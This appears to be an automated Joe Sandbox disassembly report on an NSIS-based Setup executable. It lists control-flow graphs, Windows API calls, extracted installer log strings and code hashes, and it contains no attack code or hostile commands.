                                                                                                                                                                                                                                                                control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af 
SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                • API String ID: 3581403547-784952888
                                                                                                                                                                                                                                                                • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 853 4074bb-4074c0 854 4074c2-4074ef 853->854 855 40752f-407547 853->855 857 4074f1-4074f4 854->857 858 4074f6-4074fa 854->858 856 407aeb-407aff 855->856 862 407b01-407b17 856->862 863 407b19-407b2c 856->863 859 407506-407509 857->859 860 407502 858->860 861 4074fc-407500 858->861 864 407527-40752a 859->864 865 40750b-407514 859->865 860->859 861->859 866 407b33-407b3a 862->866 863->866 869 4076f6-407713 864->869 870 407516 865->870 871 407519-407525 865->871 867 407b61-407c68 866->867 868 407b3c-407b40 866->868 884 407350 867->884 885 407cec 867->885 873 407b46-407b5e 868->873 874 407ccd-407cd4 868->874 876 407715-407729 869->876 877 40772b-40773e 869->877 870->871 872 407589-4075b6 871->872 880 4075d2-4075ec 872->880 881 4075b8-4075d0 872->881 873->867 878 407cdd-407cea 874->878 882 407741-40774b 876->882 877->882 883 407cef-407cf6 878->883 886 4075f0-4075fa 880->886 881->886 887 40774d 882->887 888 4076ee-4076f4 882->888 889 407357-40735b 884->889 890 40749b-4074b6 884->890 891 40746d-407471 884->891 892 4073ff-407403 884->892 885->883 895 407600 886->895 896 407571-407577 886->896 897 407845-4078a1 887->897 898 4076c9-4076cd 887->898 888->869 894 407692-40769c 888->894 889->878 899 407361-40736e 889->899 890->856 904 407c76-407c7d 891->904 905 407477-40748b 891->905 910 407409-407420 892->910 911 407c6d-407c74 892->911 900 4076a2-4076c4 894->900 901 407c9a-407ca1 894->901 913 407556-40756e 895->913 914 407c7f-407c86 895->914 902 40762a-407630 896->902 903 40757d-407583 896->903 897->856 906 407c91-407c98 898->906 907 4076d3-4076eb 898->907 899->885 915 407374-4073ba 899->915 900->897 901->878 916 40768e 902->916 917 407632-40764f 902->917 903->872 903->916 904->878 912 40748e-407496 905->912 
906->878 907->888 918 407423-407427 910->918 911->878 912->891 922 407498 912->922 913->896 914->878 920 4073e2-4073e4 915->920 921 4073bc-4073c0 915->921 916->894 923 407651-407665 917->923 924 407667-40767a 917->924 918->892 919 407429-40742f 918->919 926 407431-407438 919->926 927 407459-40746b 919->927 930 4073f5-4073fd 920->930 931 4073e6-4073f3 920->931 928 4073c2-4073c5 GlobalFree 921->928 929 4073cb-4073d9 GlobalAlloc 921->929 922->890 925 40767d-407687 923->925 924->925 925->902 932 407689 925->932 933 407443-407453 GlobalAlloc 926->933 934 40743a-40743d GlobalFree 926->934 927->912 928->929 929->885 935 4073df 929->935 930->918 931->930 931->931 937 407c88-407c8f 932->937 938 40760f-407627 932->938 933->885 933->927 934->933 935->920 937->878 938->902
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                                                                                                                • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                • String ID: @rD
                                                                                                                                                                                                                                                                • API String ID: 3282139019-3814967855
                                                                                                                                                                                                                                                                • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                                                                                                  • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,AllocatedPerceivedCombinesDutch,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,AllocatedPerceivedCombinesDutch,AllocatedPerceivedCombinesDutch,00000000,00000000,AllocatedPerceivedCombinesDutch,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
